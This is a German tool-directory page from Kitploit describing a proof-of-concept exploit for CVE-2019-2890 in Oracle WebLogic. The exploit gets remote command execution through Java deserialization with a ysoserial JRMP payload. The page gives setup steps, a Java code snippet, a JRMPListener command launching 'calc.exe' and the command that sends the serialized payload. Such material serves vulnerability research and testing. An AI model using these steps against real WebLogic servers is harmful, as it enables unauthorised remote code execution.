Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-2890 — PoC-Exploit für CVE-2019-2890, das auf Oracle WebLogic abzielt, unter Verwendung von ysoserial JRMP Payload für die Remote-Befehlsausführung über die Deserialisierung serialisierter Objekte. | Kitploit
Tools/GitHubGitHub/l1nk3rlin/cve-2019-2890
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRemote-Access-Tool
GitHubl1nk3rlin/cve-2019-2890

CVE-2019-2890

PoC-Exploit für CVE-2019-2890, das auf Oracle WebLogic abzielt, unter Verwendung von ysoserial JRMP Payload für die Remote-Befehlsausführung über die Deserialisierung serialisierter Objekte.

Repository anzeigen
85224vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Haftungsausschluss

Nur für Lern- und Austauschzwecke. Für andere Verwendungen übernehmen wir keine Haftung.

Beschreibung

Die relevanten JAR-Dateien wurden bereits in das Projekt importiert, und die Nutzungsmethode verwendet yso's JRMP. Beim Lernen und Debuggen kann die Nutzungsmethode geändert werden.

Zunächst muss die Datei SerializedSystemIni.dat aus dem weblogic-Verzeichnis in den Ordner security gelegt werden.

Dann muss yso in ysoserial.jar umbenannt und in das lib-Verzeichnis importiert werden.

1

Zweitens die IP-Adresse und der Port von getObject in weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Schließlich wird der JRMP-Listener aus der Ferne gestartet und die 7u21-Befehlsausführung genutzt.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Verwendung: Führen Sie Poc.java aus, um die serialisierte Datei poc.ser zu generieren, und verwenden Sie dann

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

Tool herunterladen